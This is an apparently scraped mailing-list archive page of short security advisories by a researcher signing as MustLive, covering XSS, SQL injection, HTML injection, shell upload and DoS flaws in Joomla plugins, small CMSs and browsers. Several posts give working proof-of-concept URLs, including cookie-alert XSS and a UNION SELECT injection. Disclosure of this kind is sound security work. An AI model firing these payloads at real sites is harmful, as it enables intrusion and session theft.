New User, Welcome!     Login

<< Previous Next >>

Best wishes

Cross-Site Scripting vulnerability in Mango

XSS:

http://site/archives.cfm/search/?term=%3Cbody%20onload=alert(document.cookie)%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Cross-Site Scripting vulnerability in JVClouds3D for Joomla

Vulnerable are JVClouds3D 1.0.9b and previous versions.

I mentioned about this vulnerability at my site
(http://websecurity.com.ua/3839/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers

> attack is
> going without blocking, only resources consumption (more slowly then in
> other browsers). And also this exploit must work in SeaMonkey, Internet
> Explorer 7 and other browsers.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>

[Suspected Spam]New vulnerabilities in CMS SiteLogic

Command Execution:

It's possible to upload arbitrary files (shell upload) via module “Banner 
system” in admin panel.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Re: Insufficient Authentication vulnerability in Acer notebooks

>> 2413LC and potentially other models.
>>
>> I mentioned about these vulnerability at my site
>> (http://websecurity.com.ua/3127/).
>>
>> Best wishes & regards,
>> MustLive
>> Administrator of Websecurity web site
>> http://websecurity.com.ua
>>
>>

Re: Vulnerability in CB Captcha for Joomla and Mambo

Second, this attack is directed on the site. This hole doesn't belong to
Client-side Attacks (TC v.1), but to Logical Attacks (TC v.1) and is using
against site itself. And it can be used for different malicious actions.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Re: Vulnerability in CB Captcha for Joomla and Mambo Apr 16 2010 02:04PM

New vulnerabilities in plugin DS-Syndicate for Joomla

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,0x436F6465,0x436F6465,1,1,0x436F6465,1,1,1,1,1,1,1,1,1,1,1,0x436F6465,1,1%23/../../../../1

Note, that developer of the plugin don't support it anymore, so users of the
plugin need to fix it by themselves.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Vulnerability in Joomulus for Joomla

Vulnerable are Joomulus 2.0 and previous versions.

I mentioned about this vulnerability at my site 
(http://websecurity.com.ua/3801/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Re: DoS vulnerability in Internet Explorer

Thanks for information.

Did you click on the link? Because in IE7 DoS began after the click.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message -----

Vulnerabilities in VXDate for Joomla

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Vulnerable are potentially all versions of VXDate.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

DoS vulnerability in Internet Explorer

versions too).

I mentioned about this vulnerability at my site
(http://websecurity.com.ua/3658/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Re: DoS vulnerability in Internet Explorer

versions too).

I mentioned about this vulnerability at my site
(http://websecurity.com.ua/3658/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

RE: DoS vulnerability in Google Chrome

potentially next versions too).

I mentioned about this vulnerability at my site 
(http://websecurity.com.ua/3435/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Re: Insufficient Authentication vulnerability in Acer notebooks

> 2413LC and potentially other models.
> 
> I mentioned about these vulnerability at my site 
> (http://websecurity.com.ua/3127/).
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua 
> 
>

DoS vulnerabilities in Firefox, Internet Explorer, Opera and Chrome

is only Chrome 2.x.

I mentioned about this vulnerability at my site
(http://websecurity.com.ua/3338/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Vulnerabilities in Sebo - webstore

http://site/libs/captcha/CaptchaSecurityImages.php?width=1000&height=9000

With setting of large values of width and height it's possible to create
large load at the server.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

DoS vulnerability in Google Chrome

potentially next versions too).

I mentioned about this vulnerability at my site 
(http://websecurity.com.ua/3435/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Insufficient Anti-automation and Denial of Service vulnerabilities in multiple systems

Affected products: HoloCMS 1.3.1, 3.1 and previous versions, GunCMS,
PhoenixCMS PHP Edition, Baboh Emulator, CoreCMS, Holograph Emulator,
Holograph Emulator - Craigs Edition, 0niCMS, AJ-CMS, HoloCMS v3.2.0 Synergy,
HoloCMSrW, Mir, Alexx Hotel.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Vulnerability in widget Cumulus for BlogEngine.NET

HTML Injection:

http://site/Blog/widgets/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

DoS vulnerabilities in Mozilla Firefox, Internet Explorer and Chrome

potentially next versions).

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/3424/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Cross-Site Scripting vulnerability in 3D Cloud for Joomla

Vulnerable are 3D Cloud 1.3 and previous versions.

I mentioned about this vulnerability at my site
(http://websecurity.com.ua/3883/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Vulnerability in 3D user cloud for Joomla

http://site/modules/mod_cbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/modules/mod_usr3dcloud/tagcloud_rus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Vulnerabilities in DS-Syndicate for Joomla

plugin need to fix it by themselves.

Just after disclosure of these vulnerabilities, I also found new
vulnerabilities in DS-Syndicate which I wrote about in separate advisory.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Re: Vulnerability in CB Captcha for Joomla and Mambo

>>> provided to
>>> developers. Everyone who want can create such PoC from exploit 
>>> provided in
>>> above-mentioned article from MoBiC project.
>>>
>>> Best wishes & regards,
>>> MustLive
>>> Administrator of Websecurity web site
>>> http://websecurity.com.ua
>>>
>>>

Insufficient Authentication vulnerability in Acer notebooks

2413LC and potentially other models.

I mentioned about these vulnerability at my site 
(http://websecurity.com.ua/3127/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Vulnerabilities in eSitesBuilder

http://site/ru/contacts/index.html

In registration form and in contact form there is no protection from
automated requests (captcha).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Re: wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability

Cru3l.b0y, please, always check all vulnerabilities which you find. As I
already said to author of fake vulnerability in WordPress Plugin Related
Sites 2.1 (http://websecurity.com.ua/3281/), no need to litter security
space in Internet with non-working vulnerabilities.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

> Cru3l.b0y (cru3l b0y gmail com)

Re: Insufficient Authentication vulnerability in Asus notebook

>> ).
>>
>> Now I'm continue to investigate this situation. If you'll find such  
>> case in your notebook or in desktop PC, then inform me on email.
>>
>> Best wishes & regards,
>> MustLive
>> Administrator of Websecurity web site
>> http://websecurity.com.ua
>>

Re: [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera

> nntp-client, Opera in particular. And in Opera the attack is going 
> without
> blocking, only resources consumption (more slowly then in other 
> browsers).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>

Multiple vulnerabilities in XAMPP (advisories #5 and #6)

Vulnerable are XAMPP 1.6.8 and previous versions. And potentially next
versions (including last version XAMPP 1.7.1).

-----------------------------

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
<<Previous Next>>

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!